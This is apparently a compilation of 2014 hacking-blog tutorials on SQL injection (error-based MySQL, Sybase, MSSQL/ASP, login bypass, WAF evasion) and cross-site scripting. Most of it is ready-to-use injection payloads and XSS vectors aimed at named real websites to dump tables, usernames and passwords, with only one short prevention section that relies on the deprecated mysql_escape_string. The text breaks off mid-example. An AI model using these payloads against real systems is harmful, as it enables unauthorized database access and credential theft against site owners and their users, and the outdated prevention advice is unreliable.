Friday, 12 December 2014

Error Based SQL Injection Guide

As you may know, there are several different methods of Error Based Injection. I know there's been a few tutorials lately, but I always love showing you guys something new. I'm going to be going over a few different queries you can use.

Method 1

Let's start with some Double Query.

Version

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Tables

[code]+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)[/code]

You can change the table schema to get the tables out of your specified database by converting your DB name to hex and using the following query.

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Getting The Database Names

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(schema_name+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Columns

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Data

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(COLUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

To get data out of a different database, use this query.

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(COLUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+DATABASENAME.TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Method 2

This is standard Error Based Injection.

Version

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

Tables

+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

The same rules apply, you can get the tables out of a different database by changing the schema.

+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Columns

+or+1+group+by+concat_ws(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Getting Data From The Columns

+or+1+group+by+concat_ws(0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Method 3

These here are harder methods of error based, that you shouldn't go into unless the ones above don't work.

Tables

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2)))--

Columns

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2)))--

Data

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2)))--

Method 4

Here's another method that's not very common.

Tables
parameter[]=(@:=1)||@+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Columns
parameter[]=(@:=1)||@+group+by+concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Data
parameter[]=(@:=1)||@+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Method 5

Another method, pretty basic.

Tables
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Columns
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Data
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Method 6

Here's another method, I don't see it used much.

Tables
+and+row(1,1)>(select+count(*),concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x group+by+x+limit+0,1)--

Columns
+and+row(1,1)>(select+count(*),concat((select+column_name+from+information_schema.columnes+where+table_name=0xTABLEHEX+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x group+by+x+limit+0,1)--

Data
+and+row(1,1)>(select+count(*),concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x group+by+x+limit+0,1)--

Method 7

Here's another method using Sub Selects Subselects w/ Aliases

+and+(select+*+from+(select+*+from+information_schema.tables+join+information_schema.tables+x)a)--

Duplicate column name 'TABLE_CATALOG'


This will work almost as a limit, getting you column names one by one.

+and+(select+*+from+(select+*+from+TABLENAME+as+x+join+TABLENAME+y+using+(COLUMN_NAME))as+z)--

So mine looks like this..

+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--

Duplicate column name 'TABLE_SCHEMA'


That's it for now, I'll try and update this when I learn more methods of error based injection.




Prevention of SQL Injection


This explanation will provide an insight on what goes on behind the scenes, rather than copy and pasting queries that make no sense to you.

Part 1: What is SQLi??


SQLi is short for SQL Injection. It's caused by attackers sending remote SQLqueries to the web server. These attackers have an opening when strings aren't properly escaped.

First off, let's take a look at some vulnerable code.

First off, in order to SELECT information to be displayed on a page, you need to establish a connection with the MySQL server.

connect.php

<?php
$host = "127.0.0.1"; // MySQL Host
$user = "root";  // MySQL User
$pass = "";  // MySQL Password
$db = "PHP";  // MySQL Database

$login = mysql_connect($host,$user,$pass); // Login using the variables above.

if ($login) {  /* If login is successful*/
mysql_select_db($db) /*Select the database given above*/
or die(mysql_error()); /*Cancel the page, showing an error as to what went wrong*/
} else { /*Or Else*/
echo "Error!"; /*Display a custom error message*/
}


This code here is not vulnerable, its simply a connection to the database.

Now this part is where the backdoor comes in.

<?php
include('connect.php') // Include the login configuration.

if(isset($_GET['id'])) { // If the $_GET request 'id' is set
$id = $_GET['id']; // Set a variable for the GET request
$sql = "SELECT * FROM news WHERE id='$id'"; // Set a query to send from the database requesting the $_GET parameter.
$query = mysql_query($sql) or die(mysql_error()); // Send the query, or show an MySQL error if something went wrong.
while ($row = mysql_fetch_array($query)) { // Set a variable for the row result
echo $row['title']; // Display the row 'title' from the database on the page.
}
}
?>

Now that we have all that understood, the target site will data using the $_GET parameter.
For example.

http://localhost/PHP/news.php?id=

This will return the selected row in my PHP code above, WHERE my id parameter is 1. (id is the first column in my news table).
Now everything will be normal, the data will echo on to the page with no problem. However, this allows an attacker to execute remote SQL queries via the $_GET parameter (id) due to not being escaped properly.

For example...

http://localhost/PHP/news.php?id=1' AND (1)=(1)-- x

The is changes the SQL query to the following:
$sql = "SELECT * FROM news WHERE id='1' AND (1)=(1)-- x"; // String Based Blind SQL Injection


http://localhost/PHP/news.php?id=1' AND EXTRACTVALUE(RAND(),CONCAT('~',version()))-- x
The new query becomes the following:

$sql = "SELECT * FROM news WHERE id='1' AND EXTRACTVALUE(RAND(),CONCAT(0x7e,version()))-- x";
XPATH syntax error: '~5.5.36'


This is critical, as you can see it allows users to be able to select information from your database.

http://localhost/PHP/news.php?id=1' DIV(0) UNION SELECT 1,CONCAT_WS('~',username,password),3 FROM admin LIMIT 0,1-- x

The query becomes the following:

$sql = "SELECT * FROM news WHERE id='1' DIV(0) UNION SELECT 1,CONCAT_WS('~',username,password),3 FROM admin LIMIT 0,1-- x";
admin~lol123 


Now theres tons of ways to prevent SQLInjection. Heres probably one of the easiest ways, using mysql_escape_string

<?php
function sanitize($data){
$data = mysql_escape_string(trim($data));
return $data;
}

if (isset($_GET['id'])){
$id = sanitize($_GET['id']);
$sql = "SELECT * FROM news WHERE id='$id'";
$query = mysql_query($sql) or die(mysql_error());

while ($row = mysql_fetch_array($query)){
echo $row['title'];
}
}
?>


Now your parameter is properly escaped. Thanks for taking the time to read. Hope you guys learned a few things.



Thursday, 29 May 2014

CROSS SITE SCRIPTING (XSS)



What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.<exlanation from Wikipedia>

Let’s XSS


XSS is not just pasting XSS attack vectors in search boxes , and address bars , you have to know where that input is going , how is it being parsed , etc... If you wanna learn how to find XSS holes on pages first you need to have atleast basic knowledge of HTML , Javascript and a little bit of PHP . So in this paper I will go over some XSS vulnerable websites from XSSed.com , and we will be reviewing source code of those vuln web sites. My main goal is to show you how to properly build your XSS attack vector.



I will not:
1. Show you how to steal cookies
2.Take responsibility for your action after you read this paper.


http://www.un.lk/media_centre/press_releases.php?id=XSSTest 

Lets try and change the # to something else , for example. id=XSSTest and we see that no error is shown so we can assume that webpage has accepted our input , lets see where in the source is our XSSTest string located.



Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :





Great in both examples we are already inside JavaScript


But this doesn’t proves anything , lets see will <> be parsed so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] :

Great our input is not being parsed , if it were we would have &lt;script&gt;
instead of <script> .

I will show you 2 options how to exploit it :

1. jshow(<script>) in here you can see we
are already inside the javascript so we can just do

Code:
www.un.lk/media_centre/press_releases.php?id=alert(0)


and our alertbox will be executed. Why , you ask? Look at the source code :

Our alertbox is taken as valid input and processed by our browser and there you have alertbox.[ onload= ] is Jscript event that triggers when page is loaded , so when you call it onload="Here is where javascript is located" , everything inside onload event will be processed as valid input , and so is our alert(0).

2.Every element on webpage has it’s openning [ < ] and closing [ > ] tag.
);jshow(<script>);"> as you can see closing is done with );"> so it goes like this alert(0) );"> , so for our XSS to work we must close the body tag and start a new <script> tag.So in this case we use :

Code:
www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>


<script language="javascript" type="text/javascript" defer="defer">

news_toggle_visibility(<script>);

</script>

to escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started new one<script>alert(0)</script> )


The url is :

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

or we can do this :

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

We just added <script>alert(12 vector and );</script> just closed our injected script tag.

Code:
http://www.chip.de/ii/grossbild_v2.html?sales=2122


Time to review the code , after searching for value 2122 inside the source code we get :

As you can see like in our first example we are already inside <script> tag , but in this case we have to close the value and input new Jscript code , in our case we have "2122"; so first part of our XSS vector will be "; . So lets try "; alert(0);

Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);


As you can see we are inside the script but no alertbox is shown , but why is that , it’s because of "; after our XSS attack vector , and as you can see every value that is assigned to variable has opening " and closing " and in our case we have closed somtr.prop48=" value with "; but there is "; left unclosed. You can see the problem first value is closed but what is with third " , we have to close it too , so our XSS link will be :
Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); Acid="XSS


So lets see the source :

As you can see we closed the third " and our alertbox is shown , so the rule is try to close either every tag or every value with your XSS attack vector...You will have less errors on the page you are XSSing and your XSS vector will look cooler .

Code:
http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]


Self XSS is XSS attack that is trigered when user enters payload inside the vulnerable input box , it takes SE for this type of XSS.Unlike for GET method when we can see our XSS payload inside the link bar in our browser , POST method wont show you what is webpage sending to server , so we have to use tools to see what POST values we are sending to server , we can use :

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes , one says "Login ili mobitel" and the other "Lozinka" , so lets input something inside those two input boxes and press OK button.
Lets input Text"<>/\ in "Login ili mobitel" field and Text2"<>/\ in "Lozinka" field. We get an error but lets see where did our input go , so here is the source :


Spoiler (Click to View)


What happened:

"> ----that closed src value in opened iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

and thats it , we escaped the iframe tag with "></iframe> and added new script tag <script>alert(0)</script>.To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!— (coments out the rest of code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out )

And now , maybe you think that XSS attacks can’t make any damage but big companies like Google and Facebook have a reward program for XSS findings on their sites , cos XSS attacks can be used to steal users cookies [http://jehiah.cz/a/xss-stealing-cookies-101 ]] and when you consider that big companies have millions of users , vulnerability like XSS can have devastating effect.
Se lets analyze Google XSS vulnerability which was found by ElvinGuitar, user from HackForums.net :

Vuln. link :

Code:
https://www.google.com/voice/rates?p=
Lets try :
Code:
https://www.google.com/voice/rates?p=XSSTest

We get the same page so out input is accepted , and now lets review the code :


Here is our input lets evaluate how we can exploit it , so first we notice we are inside the script , and we have '); as our first part of XSS attack vector , so lets do this

Code:
https://www.google.com/voice/rates?p='); alert(0);</script>
So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>

We closed the value with '); and added our alert event alert(0); and we close the script tag with </script> and we get our alert box.

Seems easy doesn’t it , well ElvinGuitar got 1000$ for that XSS .

And now facebook :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
So here is one advice , try searching the values from the url inside the source code , so in this case we would search the c4c288b438ed080 value and this is what we get , also you should search every value after the = in Url , and see where it’s located , so here is the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nice , so lets replace c4c288b438ed080 with Test<>"\/ an we get this :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Great , our input is not being encoded , so we see we are inside the {[ ]}; brackets , so we have to close that value with MaXoNe″]}; alert(0); // and so the url will be :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=acid″]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage(„whatever“, „whatever“, 90, 60, 80);});
...
</script>

What happened , well ″]}; closed the value and alert(0); triggered our alerbox and // is used to coment out the rest of the code all the way to the </script>.

We could use this too :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
The difference is that we closed the script tag and commented the rest of the code , like this :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry[″MaXoNe″]};alert(0); </script><!—″].saveUploadedImage(″whatever″, ″whatever″, 90, 60, 80);});
...
</script>

The green code is commented out because of the <!-- .

And this one I found on ea games site :

Code:
http://www.ea.com/search?q=

So lets try :
Code:
http://www.ea.com/search?q=Test<>/\″


And lets see what we got :
We see that <> is filtered(deleted) but ″ is not being encoded , now we know that we can escape the value of title=″ ″ so first part of our XSS payload is ″ and what can we do next , lets see , first we can’t use < > so no script , img , body or any other tag , but we are inside the <h1> tag which is the heading value , and there are Jscript events that can be used by almost every HTML element , like :

onmouseover= activates JScript code when user moves mouse over HTML tag to who event belongs.

onclick= activates JScript code when user clicks on HTML tag to who event belongs.

ondblclick= activates JScript code when user dblclicks on HTML tag to who event belongs.

onmouseout= activates JScript code when cursor leaves the are off HTML tag to who event belongs.

So we can do this :

Code:
http://www.ea.com/search?q="onclick="alert('MaXoNe');""


Code :

Spoiler (Click to View)

With " we escaped the value , and added onclick=alert("MaX"); event and with next " we closed the value that was left behind , or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of code all the way to > . So when we click the heading we get alertbox .

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--


There are vuln. columns shown on the page , we will select column 8 , so lets see the source :

We will use :

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/acid/)</script><font>',9,10,11—
Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enable we can bypass it by hexing our value :

Code:
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179  and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7​,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again review the source to find out why did I used this payload.

Thats all from me , my advice go on XSSed.com , and look at mirrors , search the code ,try different XSS payloads, be creative.
Also if you want to be good XSSer master HTML and Jscript , there is no other way.

Sybase SQL injection Tutorial


Heya guys today I will make a small tutorial on error based sybase sql injection(that is its name I guess)

So here we start with a site...am assuming u understand mysql injection

http://www.okfarmbureau.org/index.php?ac...&rowid=630

put a ' at the end and you will see this
Sybase: Server message: Unclosed quote before the character string ' '

now to get the version:

Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29-- 

so here is the version:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006
now lets get some tablenames


Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))-- 

second table:
Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects wheretype='U' and name!='boardMembers'))-- 

basically keep adding and name!='table name that you get'

here I guess i reach the end of the tables

Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' andname!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' andname!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import'and name!='publications' andname!='publications_new' and name!='radio' and name!='satellites' and name!='titles')) 


time to get columns..We will get the columns of boardMembers

Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id fromsysobjects where type='U' and name='gallery')))-- 
column no.1:
city

getting column 2:

Quote:
PHP Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))-- 

you get my point just add and name!='column name you get'

that is how I know it..If I am wrong at anything please correct me

MSSQL asp SQL INJECTION

Ok guys i'm gonna give u a tut on Sql injection this is written by me!

The sql injection on asp is same as on php...but a little bit of changes are made...

So first of all we will find some site that is Vulnerable and is on .asp

So assume that u got a site with the name of
Code:
http://www.target.com/
now find page where the site is vul to sql injection...

You can check the Vulnerability by adding single quotation '
at the end of URL like
Code:
http://www.target.com/product.asp?id=13'

If u get this error...

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query
Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error.

Code:
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.

Now we will write the query as...

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password ;)
URL will be like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Hopes i will helped you , in this type of injection we don't get much working scripts to get tables etc if i get working ones i will update this tut soon ...  enjoy !!

BURP SUITE SQL AUTHENTICATION BYPASS

Today I am going to extend my previous tutorial where I introduced you to Burp Suite tools so that we can now audit login forms for SQL Authentication Bypass vulnerabilities. This is a common problem found daily in the wild where PHP & MySQL are being used as the Authorization mechanism based on dynamic SQL Query's which are completed from user input supplied through login form. This can be time consuming and repetitive to conduct manually but it is relatively easy to audit - and after reading this it will be even easier, especially with Burp! I will first provide an explanation of the problem and what is going on which allows the vulnerability to be exploited followed by an example, so here goes…

As mentioned above Authentication Bypass vulnerabilities often occurs due to a lack of filtering of user supplied input. If we review a quick example of code from a PHP/MySQL authentication page we will begin to see things more clearly. You can find some test samples with quick Google dork “file:php/asp inurl:admin/login”, but here is sample login to keep it easy:


Code:
<?php
$sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $POST_['password'] . "'";
response = mysql_query($sql);
?>

This code fails to filter or check the user supplied input. The target system reads like so as result:

Code:
SELECT * FROM users WHERE user='' AND password=''


Since this is not filtered or checked we will pick a username and use SQL Injection on the secondary field. Let us assume we choose the username “webadmin” and the SQL Injection: ' OR 'x' = 'x

This is now how the query looks that will get passed through:

Code:
SELECT * FROM users WHERE user='webadmin' AND password='' OR 'x' = 'x'


This is how the target system actually reads & parses the request:

Code:
SELECT * FROM users WHERE user='webadmin' AND TRUE
The ultimate goal here is to use our SQL injection to alter the SQL query so that it is fooled into letting us in. This works as you can see above as ‘x’ is always going to be equal to ‘x’ so it will always return as TRUE, and thus the system will grant us webadmin user access to walk right in through the front door without any real password.

Now we could use alternative injections above, like:

  • ' or '1'='1
  • ' or 'x'='x
  • ') or ('x'='x
  • ') or ('1'='1
  • …etc

Some customization may be needed to fit your specific need (Sometimes injections need to be placed in both fields; sometimes it needs more complex syntax, HEX or Char encoding may be needed, etc). You could easily build your own list, but I have gone ahead and put together a decent list to help get you started. The list can be found in the "AuthBypass/auth-bypass.txt" file which is included in my full download here: HR’s Burp Starter Pack .

Now with Burp Suite:
Now rather than try each potential SQL statement or injection we place all of our potential injections into a single file and then let Burp run the requests in an automated fashion. This will help to save you time, as well as allow easier parsing of the results in a systematic way. In order to do this we simply submit a bogus request with arbitrary data submitted (user: foo, pass: bar). 


[Image: 62672264.png]

[Image: 28054744.png]

[Image: 21137854.png]

We then load up the request and send it to the Intruder tool to build our attack. We clear the default injection points and specifically set them around our password field or both user and password fields. You will choose the Sniper or Battering Ram attacks for this method, depending on how you want to test the form. You will then need to set the payload to run your auth-bypass.txt file. You can add some additional inspection items to the grep field if you want. I find it is often helpful to add some basic text you might see upon failed or successful login attempts (welcome, success, failed, wrong, etc).


Once you run the Intruder tool it is time to sit back and interpret the results. You will need to check time, length, grep, etc and manually review any of the requests that appear to show a noticeable variance in responses.


Once you find one, re-test it manually in the browser to see if it works.

[Image: 89323078.png]

If it works you are in, if not keep analyzing and inspecting further. 
[Image: 28104046.png]

Rinse, wash, and repeat as necessary

WAF BYPASSING TECHNIQUES


I assume you know how to perform a union based SQL injection, if not check out my tutorial here:



Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5​7,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you would like to do now is you use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5​7,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5​,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33​,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6​0,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5​,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33​,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6​0,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part; lets try to find all the databases, here is the regular syntax: 

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22​,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22​,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,​23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49​,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,​23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49​,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

it's the same to get columns, you know the drill.

If you now want to dump columns id from admin table you do like this:

Code:
